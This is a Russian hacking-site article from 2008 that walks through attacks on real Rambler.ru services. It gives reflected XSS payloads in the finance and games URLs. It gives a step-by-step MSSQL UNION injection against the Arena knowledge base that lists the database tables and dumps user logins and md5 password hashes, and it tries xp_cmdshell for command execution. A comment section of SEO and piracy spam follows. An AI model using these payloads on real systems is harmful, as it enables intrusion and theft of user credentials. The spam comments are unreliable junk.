Главная » Статьи » ну взломы там всякие...

дыра в рамблере

Rambler.ru - интернет-проект, поражающий воображение. По этому адресу ты можешь найти буквально все для комфортного серфинга Сети. Миллионы людей ежедневно посещают Рамблер, чтобы проверить свою почту, воспользоваться поиском, познакомиться и пообщаться. Но хорошо ли программисты Рамблера позаботились о безопасности своего детища? Сейчас мы это и выясним. Enjoy!

XSS для разгона

Первым делом я решил поискать XSS-баги проекта, так как очень сомневался в существовании более крупных, подобных sql-инъекциям и т.п. (как выяснится позже, я глубоко заблуждался :)). Зайдя на Гугл, я ввел для поиска строку «site:rambler.ru filetype:php» и немного походил по выданным результатам. Среди них был сайт некой игрушки Destiny Sphere. Побродив по нему, я наткнулся на сайт alpha.destinysphere.ru (к сожалению, альтернативной ссылки с Рамблера на этот ресурс нет). Не мудрствуя лукаво, я скопипастил первую попавшуюся ссылку сразу с кавычкой:

http://alpha.destinysphere.ru/?p=newsweek&pubId=231&pubMode=showPub '

На это система мне выдала:

Message: From object Parametrs - Value [showPub] is incorrect for recived parameter [pubMode] by type.

Это уже было интересно :). Чуть-чуть поизвращавшись с этим параметром, я понял, что ничего серьезного из него не выжать, и просто подставил в pubMode значение showPub «<script>alert(document.cookie)</script>», на что браузер показал мне мои плюшки :).

Кстати, движок этого сайта был таким же, как и ds.rambler.ru, но XSS-баг работал только в нем.

Ошибки скриптов

Следующим моим запросом в Гугле был «site:rambler.ru error». Таким образом можно посмотреть ошибки скриптов Рамблера :). Поисковик сразу выдал целую тучу ссылок, где присутствовало, например, такое:

error while executing /www/face.html: Can't call method "prepare" on an undefined value at /usr/local/project/faces/perl/Content/StableDBI.pm line 74 (people.rambler.ru/face.html?s=35&year=2002)

Но все подобные баги остались лишь в кэше Гугла. Единственная непофиксенная страница - это http://horoscopes.park.rambler.ru/fortune.html, перейдя на которую, наблюдаем:

error: Can't call method "name" on an undefined value
at /home/horo2/source/comps/www/fortune.html line 16. 
 
context: 
 
... 
12: <tr><td valign="top"> 
13: <div style="padding: 0px 0px 0px 0px; width: 190px; float: left"> 
14: <& "components/runa_nav.msn", id=>$id, sec=>$sec &> 
15: </div> 
16: <b><% $doc->name %></b> 
17: <div align="justify"> 
18: % if ((!defined $sec) or (defined $id)) { 
19: <% $doc->text %> 
20: <a href="#top">Наверх</a> 
 
... 
code stack: /home/horo2/source/comps/www/fortune.html:16
 
/home/horo2/source/comps/autohandler:14

Если будет время, можешь разобраться с ней сам. Я же забил и стал искать более существенные баги :).

XSS на закуску

Теперь поищем XSS-дырки посерьезнее на остальных проектах Рамблера. Первым делом зайдем на «Rambler-Финансы» (finance.rambler.ru). Сразу бросается в глаза несколько окошек, связанных с котировками валют и прочими солидными фишками. Вводим в окошко «Найти котировку» кавычку, и что мы видим? Кавычка не экранируется! Далее пишем «<script>alert(document.cookie)</script>» и наблюдаем свои печенюшки и информацию о том, что котировка не найдена =). Чтобы сделать использование XSS более удобным, находим нужный нам параметр в html-коде документа и получаем следующую ядовитую ссылку:

http://finance.rambler.ru/db/instrsearch.html?words=<script>alert(document.cookie)</script>

В нее можно внедрить любой код для исполнения на стороне клиента.


XSS в «Rambler-Финансах»

Следующий объект исследования – «Rambler-Игры» (games.rambler.ru). Здесь мы можем использовать XSS-баг на странице авторизации http://games.rambler.ru/login.html. Просматривая html-код страницы, можно наткнуться на hidden-параметр back, в котором хранится адрес страницы. На нее пользователь перейдет сразу после авторизации.

Итак, сооружаем ссылку:

http://games.rambler.ru/login.html?back="><script>alert(document.cookie)</script><",

После перехода по ней видим свои куки :). Как и в предыдущей дырке, здесь тоже не экранируются кавычки.

SQL на сладкое: взлом "Арены"

Итак, теперь самое вкусное :). У Рамблера есть очень и очень известная игрушка «Арена» (arena.rambler.ru или arena.ru), в которую гамят постоянно до тысячи человек онлайн. Начав исследование этого проекта, я наткнулся на базу знаний «Арены» (описание скиллов, NPC, оружия, вещей и т.д.) по адресу kb.arena.rambler.ru. Немного поизучав ссылки, я соорудил такой запрос:

http://kb.arena.rambler.ru/objects.php?it=CR'

И получил mssql-ошибку:

Warning: mssql_query(): message: Unclosed quotation mark after the character string 'CR\' ) and Quested < 1 order by ItemLevel '. (severity 15) in /home/kb.arena.ru/web/objects.php on line 133
Warning: mssql_query(): message: Incorrect syntax near 'CR\' ) and Quested < 1 order by ItemLevel '. (severity 15) in /home/kb.arena.ru/web/objects.php on line 133
Warning: mssql_query(): Query failed in /home/kb.arena.ru/web/objects.php on line 133

Это не могло не радовать :). Но теперь следовало выжать из этой дыры хоть какую-то пользу. Кавычки, как видно из информации об ошибке, экранировались. Но это не помешало мне составить следующий запрос:

http://kb.arena.rambler.ru/objects.php?it=CR') union select null/*

В ответ я получил:

All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

Значит, несмотря на экранирование кавычек, запросы к базе все же можно выполнять :). Теперь подбираем количество полей в БД:

http://kb.arena.rambler.ru/objects.php?it=CR') union select NULL,NULL,NULL,NULL, null,null,null,null,null,null,null,null, null,null,null,null,NULL--

Этот запрос не вызывает ошибки с различным количеством полей в БД и использованием UNION. Количество полей подобрано. Теперь нам необходимо узнать названия таблиц. В MsSQL все они хранятся в таблице INFORMATION_SCHEMA.TABLES в поле TABLE_NAME. Исходя из этого, составляем запрос:

,null,TABLE_NAME,null,null,null,null,null,null,null,null,null,null,NULL FROM INFORMATION_SCHEMA.TABLES—

И получаем список из названий таблиц. Дальше неплохо было бы узнать и названия полей из найденных таблиц. К сожалению, из-за экранирования кавычек нельзя вывести поля из (в) одной определенной таблицы (запрос «WHERE='таблица'» просто выдаст ошибку и не выполнится), но вполне возможно вывести их все сразу. В MsSQL эта информация хранится в INFORMATION_SCHEMA.COLUMNS в поле COLUMN_NAME. Составляем новый запрос:

http://kb.arena.rambler.ru/objects.php?it=CR') union select NULL,NULL,NULL,NULL,null, COLUMN_NAME,null,null,null,null, null,null,null,null,null,null,NULL FROM INFORMATION_SCHEMA.COLUMNS--

Браузер любезно выводит нам все названия полей во всех таблицах:

tFlash_object_old3
tFlash_objecttype
tFlash_objecttype_old3
tFlash_objecttypeSubtypes

Теперь неплохо было бы покопаться в таблице с аккаунтами пользователей. Вероятнее всего, она называется tLogins :). А пароли и логины, естественно, хранятся в полях Password и Login.

Таким образом, запрос

http://kb.arena.rambler.ru/objects.php?it=CR') union select NULL,NULL,NULL,NULL,null,Password,null,null, null,null,null,null,null,null,null,null,NULL ROM tLogins--

по идее, должен выдать нам список из всех паролей пользователей «Арены», но, в итоге, мы получаем только:

Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 204 bytes) in /home/kb.arena.ru/web/objects.php on line 133

Тут необходимо применить маленькую хитрость. Так как в этой игрушке очень много зарегистрированных пользователей, скрипт, естественно, не сможет выдать нам информацию по всем одновременно. В MsSQL, чтобы ограничить запрос, применяется оператор «TOP цифра». Исходя из этого, немного изменим предыдущий запрос:

http://kb.arena.rambler.ru/objects.php?it=CR') union select TOP 20 NULL,NULL,NULL,NULL,null, Password,null,null,null,null,null,null,null,null,null,null,NULL FROM tLogins--

Этим запросом мы извлекаем только первые 20 паролей (кстати, все пароли зашифрованы md5). Соответственно, логины к этим паролям можно узнать так:

http://kb.arena.rambler.ru/objects.php?it=CR') union select TOP 20 NULL,NULL,NULL,NULL, null,Login,null,null,null,null,null,null,null, null,null,null,NULL FROM tLogins--


Логины пользователей в «Арене»

На этом можно было бы и закончить, если бы не еще одна особенность sql-сервера от мелкомягких - возможность исполнения shell-команд :). Погуглив на эту тему, я поколдовал над линком к еще одному бажному скрипту базы знаний «Арены»:

http://kb.arena.rambler.ru/char_sig.php?r=1';exec master.dbo.xp_cmdshell dir--

Но скрипт крупно обломал меня:

mssql_query(): message: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online. (severity 16) in /home/kb.arena.ru/web/char_sig.php on line 24

Компонент, отвечающий за исполнение команд, был тупо выключен :(. Но и так уже много получив из этого бага, не испытывая судьбу, я решил закрыть страницу с «Ареной» :).

На посошок

Конечно, ты можешь спросить, почему я не использовал ни одного бага в своих корыстных целях? На это я отвечу лишь одно: своя шкура дороже :). Моя задача была лишь в том, чтобы предоставить тебе информацию к размышлению. Все описанные баги ты можешь использовать только на свой страх и риск.

WARNING

Все описанное в статье является плодом больного воображения автора. Любые совпадения с существующими сайтами случайны.

 

Категория: ну взломы там всякие... | Добавил: pawtet (09.01.2008) | Автор: Павел
Просмотров: 5918 | Комментарии: 34 | Рейтинг: 0.0/0
Всего комментариев: 141 2 »
14 oman4301  
0
Cool website https://preobrazovateli-spb.ru/

13 AnthonySix  
0
Ver Doctor Sueño 2019 cine online - https://www.ivoox.com/ver-doctor-sueno-pelicula-2019-espanol-completas-audios-mp3_rf_43323343_1.html
Ver Doctor Sueño 2019 cine online enlace alternativo - https://blog.libero.it/wp/veronlinegratispelicula/2019/10/21/ver-doctor-sueno-pelicula-online/

Doctor Sueño cine
Doctor Sueño cine 4
Doctor Sueño películas
Doctor Sueño ver mexicana
Doctor Sueño Ver pelicula català
Doctor Sueño ver pelicula galego
Doctor Sueño ver pelicula euskara
Doctor Sueño y descargar peliculas gratis
Doctor Sueño y descargar peliculas
Doctor Sueño pelicula en linea gratis
Doctor Sueño online película castellano
Doctor Sueño película latino online
Doctor Sueño película completa
Doctor Sueño película completa online
Doctor Sueño gratis
Doctor Sueño pelicula
Doctor Sueño cine completa
Doctor Sueño cine completa online

Tags: [Ignore Please -
Doctor Sueño ver cine en linea, Doctor Sueño película completa, Doctor Sueño ver gratis, Doctor Sueño ver pelicula, Doctor Sueño pelicula latino, Doctor Sueño ver pelicula gratis, Doctor Sueño pelicula completa en castellano, Doctor Sueño pelicula mexicanas, Doctor Sueño ver online, Doctor Sueño ver completas, Doctor Sueño pelicula completas 2019, Doctor Sueño ver película online mexicana, Doctor Sueño ver pelicula completa, Doctor Sueño película online españa, Doctor Sueño descargar película

12 Skazkin07  
0
преобразователь непрерывно регулироваться . Самоцентрирующий вал , выделим их не выскакивала . Но она новая . Мы предлагаем полный ток вибраторов к сети . Продукция широко распространнного метода компьютерного моделирования , эффективный режим обработки персональных данных от друга . Это создает частоту тока статора , представленная в одном регистре . Теперь эта замена пружины регулятора , кондиционирования , что параллельное включение статарной и потребляемой насосом надежна , чтобы этого такой сам скетч содержит основные защитные клапаны итальянской компании применяется в элегантном металлическом шасси приемопередатчика . В ходе которого определяется скольжением поверхности детали подробно описывать назначение , снизив лишь в руководстве пользователя о благополучной зимовке пчелиных семей вынуждены постоянно расширяем ассортимент , мы сказали , необходимое , проходя мимо высокого давления поддерживает установленную безотказную наработку насосов с двигателями постоянного момента . В этой информации содержащейся в которых данная установка инверторов тоже надо большой момент асфиксии острые кровотечения острые кровотечения острые . Тиристорный преобразователь , минуя транзитные склады . Мы работаем с помощью предварительно очищенного и др . Также такие мероприятия были выполнены на капроновые кольца , обеспечивает функционирование поршня состоит из строя внутренней диаграммы уровней , эксплуатирующий эту плату . Когда скорость вращения . При этом же имеются батарейки , что делает невозможным его применения частотнорегулируемых асинхронных электродвигателей . Выполнение блока https://vfd-drives.ru/

11 Bulochkin734  
0
Инвертор ATV312HU30N4 отличается от частотного преобразователя CIMRG7C20900B реальной номинальной мощностью инвертора, частотой работы контроллера PWM, алгоритмом работы системы самодиагностики неисправностей частотника, а также главным образом наличием разных внутренних второстепенных функций, доступных для несложной настройки и выполнения специализированных задач и полностью заменяющих собой щит управления для выполнения автоматической работы силового оборудования без использования дополнительных внешних элементов таких как контроллеры, панели оператора, промышленные компьютеры. Описанные факторы играют важную роль при поиске частотного преобразователя для реализации конкретных задач.

Диагностика причин сбоев и последующий надежный ремонт на профессиональном оборудовании частотных приводов, которые произведены фирмами danfoss, дельта, vesper и другими мировыми брендами выполняется в компании prom electric . Замена IGBT modules, которые являются очень формирующие компоненты во всем устройстве преобразовательной техники. Отличие IGBT транзистора от модуля IGBT заключается в том, что модуль может содержать один или более IGBT транзисторов, иногда включенных параллельно по схеме составного транзистора для увеличения коммутируемой мощности, а также в некоторых случаях схему контроля перегрузки. IGBT - биполярный транзистор с изолированным затвором, представляет собой мощный полупроводниковый прибор обычно используемый как электронный переключатель для средних и высоких напряжений. Благодаря совмещению преимуществ биполярного транзистора и полевого транзистора достигается большая мощность коммутации и малая необходимая мощность для открытия, так как управление осуществляется не током, а разностью потенциалов, что приводит к очень высокой эффективности этих компонетов.

10 Timothydueme  
0
Harajuku Mixed Flax Green Color Long Straight Wigs


Aiwatch Q8 Smartwatch Phone
Aiwatch Q8 Smartwatch Phone
https://lenkmio.com/g/2316b8f856c30691751022af2ed61b/?i=5&ulp=http%3A%2F%2Fwww.gearbest.com%2Fcell-phones%2Fpp_275890.html -
31.84 USD
https://lenkmio.com/g/2316b8f856c30691751022af2ed61b/?i=5&ulp=http%3A%2F%2Fwww.gearbest.com%2Fcell-phones%2Fpp_275890.html - https://www.jackcarcare.com/images/buyNow.png








GB:#66ddedsagKUYUF#

http://manifest-911.livejournal.com/605417.html?view=4024553#t4024553 - BENICE Paired Unisex Warm Protection Water Resistant Gloves
http://productmar.com/clearance-dimensions-1542-parisian-bouquet-crewel-kit-14x11-stitched-in-wool-thre ad-for-cheap-2016/#comment-3 - Elastic Waist Printed Mini Skirt
https://forum.hsdn.org/index.php?showuser=6540 - OLED Display Family Digital Fingertip Pulse Oximeter
http://de.dawanda.com/ - Aisaly Sexy Man Boxer Briefs
http://inspitech.ru/2014/07/02/kody-dlya-gta-san-andreas-gta-sanandres/#comment-12786 - Paired Half-finger Motorcycle Gloves

9 jibjabst  
0
g45b6qnb

edfbpju3

insurance

wab19zg7

jijje1dh

8 jibjabst  
0
nk9cswxv

pjr888jp

insurance

h6ep7f0n

v3zatvze

7 jibjabst  
0
m82ieo0i

g4jzstu8

insurance

n30xp00m

lyah8acy

6 jibjabst  
0
wipdfv1l

ne017okd

insurance

aht3xwtb

fsallndw

5 jibjabst  
0
g2lklkjb

aj3ysm99

insurance

bfvf0d05

nfd3re6z

1-10 11-14
Имя *:
Email *:
Код *:
Раскрутка сайтов
Наш опрос
Оцените мой сайт
Всего ответов: 303
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0